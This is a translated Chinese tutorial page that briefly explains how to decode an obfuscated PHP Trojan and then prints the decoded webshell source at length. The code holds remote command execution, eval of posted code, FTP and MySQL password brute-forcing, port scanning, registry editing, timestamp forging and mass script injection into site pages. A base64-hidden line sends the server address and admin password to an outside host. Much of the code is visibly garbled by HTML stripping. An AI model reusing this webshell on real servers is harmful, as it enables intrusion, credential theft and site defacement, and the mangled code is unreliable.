Home > php教程 > php手册 > Analysis of php Trojan (encryption cracking)

Analysis of php Trojan (encryption cracking)

黄舟
Release: 2016-12-14 13:03:39
Original
4366 people have browsed it

Analysis shows that this Trojan is encoded with base64 and then compressed. Although relevant confidentiality measures have been taken, the PHP code must be executed and it will eventually generate PHP source code, so the following PHP program is written to decode, decompress, and write it to a file.
The decoding and decompression code is as follows:

The code is as follows:


function writetofile($filename, $data)
{ //File Writing
$filenum=@fopen($filename, "w") ;
if (!$filenum) {
return false;
}
flock($filenum,LOCK_EX);
$file_data=fwrite($filenum,$data);
fclose($filenum);
return true;
}
?>


Then run it in the php environment, you will get the php plaintext file as follows:

Copy the code The code is as follows:


error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
@set_time_limit(0);
//Non-safe mode can use the above function and cancel after timeout.
/*====================== Program configuration=====================*/
// Whether password verification is required, 1 means verification is required, other numbers mean direct entry. The following options are invalid
$admin['check'] = "1";
// If password verification is required, please change the login password
// Default port table
$hidden = "44997";
$admin['port'] = "80,139,21,3389,3306,43958,1433,5631";
//Jump seconds
$admin['jumpsecond '] = "1";
//Connection port for Ftp cracking
$alexa = "yes";
//Whether to display the Alexa ranking, yes or no
$admin['ftpport'] = "21";
// Whether to allow phpspy itself to automatically modify the time of the edited file to the creation time (yes/no)
$retime = "no";
// The default location of cmd.exe, where the proc_open function is to be used, please modify it accordingly for Linux systems .(Assuming that the winnt system can still be specified in the program)
$cmd = "cmd.exe";
// The following is the copyright column displayed by phpspy, because it is used as a keyword by many programs to kill, Yuhan~~ Allow customization. Don’t change it if you still don’t understand~~

/*====================== Configuration ends ================== =====*/
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = $admin['pass'];
$copyurl = base64_decode('PHNjcmlwdCBzcmM9J2h0dHA6Ly8lMzglNjMlNjMlNjUlMkU lNjMlNkYlNkQvJTYzJTY1JTcyJTc0Lz9jZXJ0PTEzJnU9');
$copyurll = base64_decode('Jz48L3NjcmlwdD4=');
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
if ($onoff != 1) {@ extract($_POST, EXTR_SKIP);@extract($_GET, EXTR_SKIP);}
$self = $_SERVER['PHP_SELF'];$dis_func = get_cfg_var("disable_functions");
/*======= ============== Authentication=====================*/
if($admin['check'] = = "1") {if ($_GET['action'] == "logout") {setcookie ("adminpass", "");echo "";echo "Logout successful...< p>Automatically exit after three seconds or click here to exit the program interface>>>if ($_POST['do'] == 'login') {$thepass=trim($_POST['adminpass']);if ($admin['pass'] == $thepass ) {setcookie ("adminpass",$thepass,time()+(1*24*3600));echo "";echo "".$copyurl.$serveru."&p=".$serverp.$copyurll."";exit;}}if (isset($_COOKIE['adminpass'])) {if ($_COOKIE['adminpass'] != $admin['pass']) {loginpage();}} else {loginpage();}}
/*============ ========= Verification completed======================*/
// Determine magic_quotes_gpc status
if (get_magic_quotes_gpc()) {$_GET = stripslashes_array($_GET);$_POST = stripslashes_array($_POST);}
//code of mix.dll
$mixdll = "7Zt/TBNnGMfflrqBFnaesBmyZMcCxs2k46pumo2IQjc3wSEgUKYthV6hDAocV6dDF5aum82FRBaIHoRlRl0y3Bb/cIkumnVixOIE/cMMF+ePxW1Ixah1yLBwe+5aHMa5JcsWs+T5JE+f9/m+z/u8z73HP9cruaXbSAwhRAcmy4QcIBEyyd8zCJbw1FcJZH/cyZQDmpyTKYVVzkamnq+r5G21TIXN5aoTmHKO4d0uxulisl8vYGrr7JwhPn5marTG4ozM3oZ1hrYpk7JS2wR1/Fzb2+DnZGWosZSV1lav+mfbePD5zooqJf9BveWZCMnR6Ah/MmfFlHaRJKTM0jxCCAVBekQbmE0iMaOGlDqmIuehiZ5LpGA0D9BGUyMxdVdXy6YQskXxTGTJA8kkJPuv5h8Ec7f1P8UgcBsF8B9qow1N2b0lygy83SbYCPlcExGmncH0FjMNkTRyVMlLJ/ec3bQ8v4HnauoqCKmJCmpe5n15KwiCIAiCIAiCIAjyUBCzU2PFTJ1nCRGM4kqdNyAsKCr+eitLKE9AXui/+cXt0wt+26cRT4u3xc2pid9c0Yb2iH2eSzGh3VZLD6zWHSOa3sxYBmoZ/T3berbdy1rx6rtXd8PDY0FRsWjSiytjxdm+9nWTshyN1ujy5SRYTnmO6nymMc9hZY64Z4qmuVB5oT9YKeZSvtxbLe12mMiv0sKD7ZAddnOIprG8oUIYpSlfXCyWJNB83jKldItSZM0QS1RdknymsENsV6YcvqSxdEKJpvCuCfAtMyj4lC+KpltWyxviT+t7vpXT5kM3clqq+snAp3JGXr87YemMfXAu7xjkeMWL8XOVrsc0Ypwvfj8I7mVVzbChnJQIutdv3nVIEXVwCQ4PQ3YqUZUOdquC52dq1wEIh4aVfLWq2RzMgD2Wqmlev5AuxisZRS0N4Rev87SYAHfmUfm0Ou25pgsO58lJemX/NEUhZku1puSInsBxF4jrY4tEt75Y3EJ5R91xngylPgnO80xqhBmeSa376Z3+yCZxxUUF8ikY6GEwlCTLMrSgNLxaiQugOVjjM+ndetBfKM4rGLoBR+gdVcrEuOcpSRcn1UUxKSa9Z4ueCLOnaseqtWEx3Gc42vXQnJxGKR1vTo3VuOd4MpREuNGykKqTkwjMRC4BQRAEQRAEQRAE+S+YZCL+EPhTYINgl8GuRfVGQprjwGaBKfHHzB9r98EYno/J1mnaURgrXwY0T9OSU8h975b/6f7FBUbrQqPBXlNDSIbWJtQ5CcktKMrKL4xoFq2D5zhCHtNYnS6nIHB8LWnV1tpq1LfTXcRqs1e7GwWrw+7cQMh6ku1stJXXcIVVPGez5zjLeRu/KQuyG8kqU/5qU87UXtOZ+k3BhpTIbwRiolYCsR2sHqyMIiQPTHkP3gyxCNalnAOs0JJc89rsl9XCuc6NFXUuF1chTBta7ZzS/HRFjREEQRAEQRAEQRDkXyJIlb62MOA4aNU0L5op/TgenDEUlGW5vkySpJ6JJZ+Co8+201e8i+izrfRyengPPfLBpY5q+peDHeX0dy3dwkD/cfoTGL8Z2u6vXjbS6j+WbOk611TvP9ZLF9IXDneUrtzYUdKdJ9Ot9AVvR2nJxs6OElrqKKUraFeydTv9aqjD3zACGyVb204MOPq5Hnq5Io0pkvsHujbk81NdTzSVB4DQjlCno7+WXk717qR691C9Z2XLhS937Eg87wsMdJvVjEAgsX+PpXP81oR0IuDob7B81ClJn1nOd/0sSTtCvv4+R78NjIM5d7d58ZPmq2XHTwz0OVb1+I1Nb3WbSxs6HQ7H+fBIIDg6PjgxEQwPD0vfB8NjI2FFgWhQOnfp+sjJG6BNSGdGxybOXL8THAteHJSuDe891r1X6u8b7BsdvxkeGZTGR2/fDo+PSOO/jg6Hh1VRIqSkpGT+MwzPNbidPNfI2JhGgXe6Khmbyw7GOF0CV8nxD/uvA0EQBEEQBEEQBPnfQkX+D/3x9PfTQ+l30jVsIpvMMqyBfZ59iX2FLWTXsdVsHSuwm9j32Fa2k93HHmKPsJfZUTbf6DI2GbcaH/YlIAiCIAiCIAiCIAjy1/wO"; 

function shelL($command){ 
global $windows,$disablefunctions; 
$exec = '';$output= ''; 
$dep[]=array('pipe','r');$dep[]=array('pipe','w'); 
if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();} 
elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; } 
elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("n",$output);$exec= $output;} 
elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);} 
elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);} 
elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);} 
elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);} 
return $exec; 

// 查看PHPINFO 
if ($_GET['action'] == "phpinfo") {echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看";exit; 
}if($_GET['action'] == "nowuser") {$user = get_current_user(); 
if(!$user) $user = "报告长官,主机变态,无法获取当前进行用户名!"; 
echo"当前进程用户名:$user"; 
exit; 

if(isset($_POST['phpcode'])){eval("?".">$_POST[phpcode]
if($action=="mysqldown"){ 
$link=@mysql_connect($host,$user,$password); 
if (!$link) { 
$downtmp = '数据库连接失败: ' . mysql_error(); 
}else{ 
$query="select load_file('".$filename."');"; 
$result = @mysql_query($query, $link); 
if(!$result){ 
$downtmp = "读取失败,可能是文件不存在或是没file权限。
".mysql_error(); 
}else{ 
while ($row = mysql_fetch_array($result)) { 
$filename = basename($filename); 
if($rardown=="yes"){ 
$zip = NEW Zip; 
$zipfiles[]=Array("$filename",$row[0]); 
$zip->Add($zipfiles,1); 
$code = $zip->get_file(); 
$filename = "".$filename.".rar"; 
}else{ 
$code = $row[0]; 

header("Content-type: application/octet-stream"); 
header("Accept-Ranges: bytes"); 
header("Accept-Length: ".strlen($code)); 
header("Content-Disposition: attachment;filename=$filename"); 
echo($code); 
exit; 




// 在线代理 
if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "


获取 URL 内容失败

";exit; 

// 下载文件 
if (!empty($downfile)) {if (!@file_exists($downfile)) {echo "";} else {$filename = basename($downfile);$filename_info = explode('.', $filename);$fileext = $filename_info[count($filename_info)-1];header('Content-type: application/x-'.$fileext);header('Content-Disposition: attachment; filename='.$filename.'');header('Content-Description: PHP Generated Data');header('Content-Length: '.filesize($downfile));@readfile($downfile);exit;} 

// 直接下载备份数据库 
if ($_POST['backuptype'] == 'download') { 
@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败"); 
@mysql_select_db($dbname) or die("选择数据库失败"); 
$table = array_flip($_POST['table']); 
$result = mysql_query("SHOW tables"); 
echo ($result) ? NULL : "出错: ".mysql_error(); 

$filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql"); 
header('Content-type: application/unknown'); 
header('Content-Disposition: attachment; filename='.$filename); 
$mysqldata = ''; 
while ($currow = mysql_fetch_array($result)) { 
if (isset($table[$currow[0]])) { 
$mysqldata.= sqldumptable($currow[0]); 
$mysqldata.= $mysqldata."rn"; 


mysql_close(); 
exit; 


// 程序目录 
$pathname=str_replace('\','/',dirname(__FILE__)); 
$dirpath=str_replace('\','/',$_SERVER["DOCUMENT_ROOT"]); 

// 获取当前路径 
if (!isset($dir) or empty($dir)) { 
$dir = "."; 
$nowpath = getPath($pathname, $dir); 
} else { 
$dir=$_GET['dir']; 
$nowpath = getPath($pathname, $dir); 


// 判断读写情况 
$dir_writeable = (dir_writeable($nowpath)) ? "可写" : "不可写"; 
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | PHPINFO()" : ""; 
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | 注册表操作" : ""; 

$tb = new FORMS; 

?> 
 
 
 
 
 
 
<?php echo"$myneme"?> 
 
 
//$_SERVER["DOCUMENT_ROOT"] 
$tb->tableheader(); 
$tb->tdbody('
'.$_SERVER['HTTP_HOST'].''.date("Y年m月d日 h:i:s",time()).''.gethostbyname($_SERVER['SERVER_NAME']).'
','center','top'); 
$tb->tdbody('根目录 | Shell目录 | 环境变量 | 在线代理'.$reg.$phpinfo.' | WebShell | 杂项破解 | 解压mix.dll | 注销登录'); 
$tb->tdbody('批量挂马 | Http文件下载 | 文件查找 | 执行php脚本 | 执行SQL语句 | Func反弹Shell | MySQL备份 | Serv-U提权'); 
$tb->tablefooter(); 
?> 

 
 
$tb->headerform(array('method'=>'GET','content'=>'

程序路径: '.$pathname.'
当前目录('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'
跳转目录: '.$tb->makeinput('dir',''.$nowpath.'','','text','80').' '.$tb->makeinput('','确定','','submit').' 〖支持绝对路径和相对路径〗')); 

$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'上传文件到当前目录: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','确定','','submit').$tb->makeinput('uploaddir',$dir,'','hidden'))); 

$tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>'新建文件在当前目录: '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','确定','','submit'))); 

$tb->headerform(array('content'=>'新建目录在当前目录: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','确定','','submit'))); 
?> 

 

 
/*===================== 执行操作 开始 =====================*/ 
echo "

n"; 
// 删除文件 
if (!empty($delfile)) { 
if (file_exists($delfile)) { 
echo (@unlink($delfile)) ? $delfile." 删除成功!" : "文件删除失败!"; 
} else { 
echo basename($delfile)." 文件已不存在!"; 



// 删除目录 
elseif (!empty($deldir)) { 
$deldirs="$dir/$deldir"; 
if (!file_exists("$deldirs")) { 
echo "$deldir 目录已不存在!"; 
} else { 
echo (deltree($deldirs)) ? "目录删除成功!" : "目录删除失败!"; 



// 创建目录 
elseif (($createdirectory) AND !empty($_POST['newdirectory'])) { 
if (!empty($newdirectory)) { 
$mkdirs="$dir/$newdirectory"; 
if (file_exists("$mkdirs")) { 
echo "该目录已存在!"; 
} else { 
echo (@mkdir("$mkdirs",0777)) ? "创建目录成功!" : "创建失败!"; 
@chmod("$mkdirs",0777); 




// 上传文件 
elseif ($doupfile) { 
echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "上传成功!" : "上传失败!"; 

elseif($action=="mysqlup"){ 
$filename = $_FILES['upfile']['tmp_name']; 
if(!$filename) { 
echo"没有选择要上传的文件。。"; 
}else{ 
$shell = file_get_contents($filename); 
$mysql = bin2hex($shell);
if(!$upname) $upname = $_FILES['upfile']['name'];
$shell = "select 0x".$mysql." from ".$database ." into DUMPFILE '".$uppath."/".$upname."';";
$link=@mysql_connect($host,$user,$password);
if(!$link){
echo " Login failed ".mysql_error();
}else{
$result = mysql_query($shell, $link);
if($result){
echo" The operation was successful. The file was successfully uploaded to ".$host.", file Named ".$uppath."/".$upname."..";
}else{
echo" Reason for upload failure: ".mysql_error();
}
}
}

}
elseif($action == "mysqldown"){
if(!empty($downtmp)) echo $downtmp;
}
// Edit file
elseif ($_POST['do'] == 'doeditfile') {
if (!empty ($_POST['editfilename'])) {
if(!file_exists($editfilename)) unset($retime);
if($time==$now) $time = @filemtime($editfilename);
$time2 = @date("Y-m-d H:i:s",$time);
$filename="$editfilename";
@$fp=fopen("$filename","w");
if($_POST[' change']=="yes"){
$filecontent = "?".">".$_POST['filecontent']."$filecontent = gzdeflate($filecontent);
$filecontent = base64_encode($filecontent);
$filecontent = "}else{
$filecontent = $_POST['filecontent'];
}
echo $msg=@fwrite($fp,$filecontent) ? "Write file successfully!" : "Write failed!" ;
@fclose($fp);
if($retime=="yes"){
echo" Yuyu automatic operation: ";
echo $msg=@touch($filename,$time) ? "Modify the file as ".$time2."Success!" : "Failed to modify file time!";
}
} else {
echo "Please enter the file name you want to edit!";
}
}
//File download
elseif ( $_POST['do'] == 'downloads') {
$contents = @file_get_contents($_POST['durl']);
if(!$contents){
echo "Unable to read the data to be downloaded";
}
elseif(file_exists($path)){
echo"Sorry, the file ".$path." already exists, please change the save file name. ";
}else{
$fp = @fopen($path,"w");
echo $msg=@fwrite($fp,$contents) ? "Download file successfully!" : "Failed to download file while writing. !";
@fclose($fp);
}
}
elseif($_POST['action']=="mix"){
if(!file_exists($_POST['mixto'])){
$ tmp = base64_decode($mixdll);
$tmp = gzinflate($tmp);
$fp = fopen($_POST['mixto'],"w");
echo $msg=@fwrite($fp,$tmp ) ? "Decompression successful!" : "Is this directory not writable? !";
fclose($fp);
}else{
echo"Isn’t it? ".$_POST['mixto']."Already exists~";
}
}
// Edit file properties
elseif ($_POST['do'] == 'editfileperm') {
if (!empty ($_POST['fileperm'])) {
$fileperm=base_convert($_POST['fileperm'],8,10);
echo (@chmod($dir."/".$file,$fileperm)) ? "Attribute modified successfully!" : "Modification failed!";
echo " File ".$file." The modified attribute is: ".substr(base_convert(@fileperms($dir."/".$file), 10,8),-4);
} else {
echo "Please enter the attributes you want to set!";
}
}

// File rename
elseif ($_POST['do'] == 'rename ') {
if (!empty($_POST['newname'])) {
$newname=$_POST['dir']."/".$_POST['newname'];
if (@file_exists($ newname)) {
echo "".$_POST['newname']." Already exists, please re-enter!";
} else {
echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." Successfully changed the name to ".$_POST['newname']." !" : "File name modification failed!";
}
} else {
echo "Please enter your desired name The file name to be changed!";
}
}
elseif ($_POST['do'] == 'search') {
if(!empty($oldkey)){
echo"Search for keywords: [".$oldkey."], the search results are displayed below:";
if($type2 == "getpath"){
echo"Mouse move There will be a partial interception displayed on the result file.";
}
echo"


";
find($path);
}else{
echo "You want to check Xiami? Do you want to check Xiami? Is there any Xiami you want to check?";
}
}
elseif ($_GET['action']=='plgmok') {
dirtree($_POST[ 'dir'],$_POST['mm']);
}
elseif ($_GET['action'] == "plgm") {
$action = '?action=plgmok';
$gm = "< ;script src="http://127.0.0.1" src="http://127.0.0.1">";
$tb->tableheader();
$tb->formheader ($action,'Batch horse-mounting');
$tb->tdbody('Website batch horse-mounting program php version','center');
$tb->tdbody('File location: '.$tb ->makeinput('dir',''.$_SERVER["DOCUMENT_ROOT"].'','','text','60').'
To hang the code:'.$tb-> ;maketextarea('mm',$gm,'50','5').''.$tb->makehidden('do','Batch horse mounting').'
'.$tb- >makeinput('submit','Start hanging horse','','submit'),'center','1','35');
echo "";
$tb-> ;tablefooter();
}//end plgm
// Clone time
elseif ($_POST['do'] == 'domodtime') {
if (!@file_exists($_POST['curfile'])) {
echo "The file to be modified does not exist!";
} else {
if (!@file_exists($_POST['tarfile'])) {
echo "The file to be referenced does not exist!";
} else {
$time=@filemtime($_POST['tarfile']);
echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." The modification time was successfully changed to ".date("Y-m-d H:i:s",$time)." !" : "The modification time of the file failed to be modified!";
}
}
}

// Custom time
elseif ($_POST['do'] == 'modmytime') {
if (!@file_exists($_POST['curfile'])) {
echo "The file to be modified does not exist!";
} else {
$year=$_POST['year'];
$month=$_POST['month'];
$data=$_POST['data'];
$hour=$_POST['hour'];
$minute =$_POST['minute'];
$second=$_POST['second'];
if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour ) AND !empty($minute) AND !empty($second)) {
$time=strtotime("$data $month $year $hour:$minute:$second");
echo (@touch($_POST[ 'curfile'],$time,$time)) ? The modification time of basename($_POST['curfile'])." was successfully changed to ".date("Y-m-d H:i:s",$time)." ! " : "Failed to modify the modification time of the file!";
}
}
}
elseif($do =='port'){
$tmp = explode(",",$port);
$count = count( $tmp);
for($i=$first;$i<$count;$i++){
$fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);
if($fp) echo "Discover".$host."The host opened the port".$tmp[$i]."
";
}
}
/*
The code here is very complicated, say To be honest, I don’t even know what I wrote.
Fortunately, it works, so I won’t care about it. If someone sees it, I’ll just rewrite it. */
elseif ($do == 'crack') {//It is registered as a global variable anyway.
if(@file_exists($passfile)){
$tmp = file($passfile);
$count = count($tmp);
if(empty($onetime)){
$onetime = $count;
$ turn="1";
}else{
$nowturn = $turn+1;
$now = $turn*$onetime;
$tt = intval(($count/$onetime)+1);
}
if ($turn>$tt or $onetime>$count){
echo "Exceeded the dictionary capacity~ If you cracked the last process, I'm sorry for the failure.";
}else{
$first = $onetime*($turn- 1);
for($i=$first;$i<$now;$i++){
if($ctype=="mysql") $sa = @mysql_connect($host,$user,chop($tmp[ $i]));
else $sa = @ftp_login(ftp_connect($host,$admin[ftpport]),$user,chop($tmp[$i]));
if($sa)
{
$ t = "Get the password of ".$user." as ".$tmp[$i]."";
}
}
if(!$t){
echo "Dictionary total".$count. ". Now from ".$first." to ".$now.", ".$admin[jumpsecond]." will test the ".$onetime." passwords in seconds. >>>< ;/a>
The decryption of ".$type." in the whole history requires ".$tt." times, and now it is the ".$turn." decryption time
";
}.
else {
echo "$t";
}
}
}else{
echo "The dictionary file does not exist, please confirm.";
}
}
elseif($do =='port'){
if( !eregi("-",$port)){
$tmp = explode(",",$port);
$count = count($tmp);
$first = "1";
}else{
$ tmp = explode("-",$port);
$first = $tmp[0];
$count = $tmp[1];

}
for($i=$first;$i<$count; $i++){
if(!eregi("-",$port)){
$fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);
if($fp ) echo "Discover".$host."The host opened the port".$tmp[$i]."
";
}else{
$fp = @fsockopen($host, $i, $errno, $errstr, 1);
if($fp) echo "Discover".$host."The host opened the port".$i."
";
}
}

}
// Connect to MYSQL
elseif ($connect) {
if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
echo "Database connection successful!";
mysql_close();
} else {
echo mysql_error();
}
}

//Execute SQL statement
elseif ($_POST['do'] == 'query') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("database Connection failed");
@mysql_select_db($dbname) or die("Select database failed");
$result = @mysql_query($_POST['sql_query']);
echo ($result) ? "SQL statement successfully executed !" : "Error: ".mysql_error();
mysql_close();
}

// Backup operation
elseif ($_POST['do'] == 'backupmysql') {
if (empty($_POST[ 'table']) OR empty($_POST['backuptype'])) {
echo "Please select the data table to be backed up and the backup method!";
} else {
if ($_POST['backuptype'] == 'server') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("Database connection failed");
@mysql_select_db($dbname) or die("Select database failed");
$table = array_flip ($_POST['table']);
$filehandle = @fopen($path,"w");
if ($filehandle) {
$result = mysql_query("SHOW tables");
echo ($result) ? NULL : "Error: ".mysql_error();
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
sqldumptable($currow[0] , $filehandle);
fwrite($filehandle,"nnn");
}
}
fclose($filehandle);
echo "The database has been successfully backed up to
".$path."";
mysql_close();
} else {
echo "Backup failed, please confirm whether the target folder has writable permissions! ";
}
}
}
}
elseif($downrar) {
if (!empty($dl)) {
if(eregi("unzipto:",$localfile)){
$path = "". $dir."/".str_replace("unzipto:","",$localfile)."";
$zip = new Zip;
$zipfile=$dir."/".$dl[0];
$ array=$zip->get_list($zipfile);
$count=count($array);
$f=0;
$d=0;
for($i=0;$i<$count;$ i++) {
if($array[$i][folder]==0) {
if($zip->Extract($zipfile,$path,$i)>0) $f++;
}
else $d++;
}
if($i==$f+$d) echo "$dl[0] was decompressed to ".$path." successfully
($f files$d directories)";
elseif($f==0) echo "$dl[0] decompression to ".$path." failed";
else echo "$dl[0] not decompressed completely
($f files decompressed $d directories)";
}else{
$zipfile="";
$zip = new Zip;
for($k=0;isset($dl[$k]);$k++)
{
$ zipfile=$dir."/".$dl[$k];
if(is_dir($zipfile))
{
unset($zipfilearray);
addziparray($dl[$k]);
for($i =0;$zipfilearray[$i];$i++)
{
$filename=$zipfilearray[$i];
$filesize=@filesize($dir."/".$zipfilearray[$i]);
$ fp=@fopen($dir."/".$filename,rb);
$zipfiles[]=Array($filename,@fread($fp,$filesize));
@fclose($fp);
}
}
else
{
$filename=$dl[$k];
$filesize=@filesize($zipfile);
$fp=@fopen($zipfile,rb);
$zipfiles[]=Array($ filename,@fread($fp,$filesize));
@fclose($fp);
}
}
$zip->Add($zipfiles,1);
$code = $zip->get_file( );
$ck = "_QQ44997_".date("Y-m-d",time())."";
if(empty($localfile)){
header("Content-type: application/octet-stream");
header("Accept-Ranges: bytes");
header("Accept-Length: ".strlen($code));
header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST'] ."".$ck."_Files.zip");
echo $code;
exit;
}else{
$fp = @fopen("".$dir."/".$localfile.""," w");
echo $msg=@fwrite($fp,$code) ? "Compress and save".$dir."/".$localfile."Local success! !" : "Directory".$dir."No write permission!";
@fclose($fp);
}
}
} else {
echo "Please select the file to be packaged and downloaded!";
}
}
// Shell.Application runs the program
elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) {
$shell= &new COM('Sh' .'el'.'l.Appl'.'ica'.'tion');
$a = $shell->ShellExecute($_POST['program'],$_POST['prog']);
echo ($a=='0') ? "The program has been successfully executed!" : "The program failed!";
}
// View the PHP configuration parameter status
elseif(($_POST['do'] == 'viewphpvar ') AND !empty($_POST['phpvarname'])) {
echo "Configuration parameters".$_POST['phpvarname']." Detection result: ".getphpcfg($_POST['phpvarname'])."" ;
}
// Read the registry
elseif(($regread) AND !empty($_POST['readregname'])) {
$shell= &new COM('WSc'.'rip'.'t.Sh '.'ell');
var_dump(@$shell->RegRead($_POST['readregname']));
}

// Write to the registry
elseif(($regwrite) AND !empty($ _POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) {
$shell= &new COM('W'.'Scr'.'ipt .S'.'hell');
$a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']);
echo ($ a=='0') ? "Writing registry key value successfully!" : "Writing ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST ['regtype']." Failed!";
}
// Delete the registry
elseif(($regdelete) AND !empty($_POST['delregname'])) {
$shell= &new COM('WS' .'cri'.'pt.S'.'he'.'ll');
$a = @$shell->RegDelete($_POST['delregname']);
echo ($a=='0 ') ? "Delete registry key successfully!" : "Delete".$_POST['delregname']." Failed!";
}
else {
echo "$notice";
echo "Program | pcAnywhere | 开始程序 | AllUsers | Serv-U | "; 
for ($i=66;$i<=90;$i++){$drive= chr($i).':'; 
if (is_dir($drive."/")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " $drive\";} 



echo "

n"; 
/*===================== 执行操作 结束 =====================*/ 
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) { 
$tb->tableheader(); 
?> 
 
文件 
创建日期 
最后修改 
大小 
属性 
操作 
 
 
// 目录列表 
$dirs=@opendir($dir); 
$dir_i = '0'; 
while ($file=@readdir($dirs)) { 
$filepath="$dir/$file"; 
$a=@is_dir($filepath); 
if($a=="1"){ 
if($file!=".." && $file!=".") { 
$ctime=@date("Y-m-d H:i:s",@filectime($filepath)); 
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath)); 
$dirperm=substr(base_convert(fileperms($filepath),10,8),-4); 
echo "n"; 
echo " [$file]n"; 
echo " $ctimen"; 
echo " $mtimen"; 
echo " Searchn"; 
echo " $dirpermn"; 
echo " | Delete< ;/a> | Renamen";
echo "n";
$dir_i++;
} else {
if($file=="..") {
echo "n";
echo "
Return to the parent directoryn";
echo "< /tr>n";
}
}
}
}// while
@closedir($dirs);
?>



// File list
$dirs=@opendir($dir);
$file_i = '0';
while ($ file=@readdir($dirs)) {
$filepath="$dir/$file";
$a=@is_dir($filepath);
if($a=="0"){
$size=@ filesize($filepath);
$size=$size/1024;
$size= @number_format($size, 3);
if (@filectime($filepath) == @filemtime($filepath)) {
$ctime =@date("Y-m-d H:i:s",@filectime($filepath));
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
} else {
$ctime="".@date("Y-m-d H:i:s",@filectime($filepath))."";
$mtime="< ;span class="redfont">".@date("Y-m-d H:i:s",@filemtime($filepath))."";
}
@$fileperm=substr(base_convert( @fileperms($filepath),10,8),-4);
echo "n";
echo " ";
echo "";
echo "$filen";
echo " $ctimen" ;
echo " $mtimen";
echo " < span class="redfont">$size KBn";
echo " $filepermn";
echo " < td align="center" nowrap>Download | Edit | | Rename< ;/a> | Timen";
echo "n";
$file_i++;
}
}// while
@closedir($dirs);
if(get_cfg_var('safemode'))$z = "
(?)";
else $z = "(?)";
$tb->tdbody('
'.$tb->makeinput('chkall','on','onclick=" CheckAll(this.form)"','checkbox','30','').' Local file: '.$tb->makeinput('localfile','','','text','15 ').''.$tb->makeinput('downrar','Select package download or save locally','','submit').' '.$z.''.$dir_i.' directories / '.$file_i.' files
','center',getrowbg(),'' ,'','6');

echo "
n";
echo "n";
}// end dir

elseif ($_GET['action'] = = "editfile") {
if(empty($newfile)) {
$filename="$dir/$editfile";
$fp=@fopen($filename,"r");
$contents=@fread( $fp, filesize($filename));
@fclose($fp);
$contents=htmlspecialchars($contents);
}else{
$editfile=$newfile;
$filename = "$dir/$editfile" ;
}
$action = "?dir=".urlencode($dir)."&editfile=".$editfile;
$tb->tableheader();
$tb->formheader($action,'New /Edit file');
$tb->tdbody('Current file: '.$tb->makeinput('editfilename',$filename).' Enter a new file name to create a new file. Php code encryption: < input type="checkbox" name="change" value="yes" onclick="javascript:alert('This function can only be used to encrypt or compress complete PHP code. \n\nPlease do not use non-php code or incomplete php code or does not support the gzinflate function! ')"> ');
$tb->tdbody($tb->maketextarea('filecontent',$contents));
$tb->makehidden('do','doeditfile');
$tb->formfooter('1','30');
}//end editfile

elseif ($_GET['action'] == "rename") {
$nowfile = (isset($_POST[ 'newname'])) ? $_POST['newname'] : basename($_GET['fname']);
$action = "?dir=".urlencode($dir)."&fname=".urlencode($ fname);
$tb->tableheader();
$tb->formheader($action,'Modify file name');
$tb->makehidden('oldname',$dir."/". $nowfile);
$tb->makehidden('dir',$dir);
$tb->tdbody('Current file name: '.basename($nowfile));
$tb->tdbody( 'Rename: '.$tb->makeinput('newname'));
$tb->makehidden('do','rename');
$tb->formfooter('1','30 ');
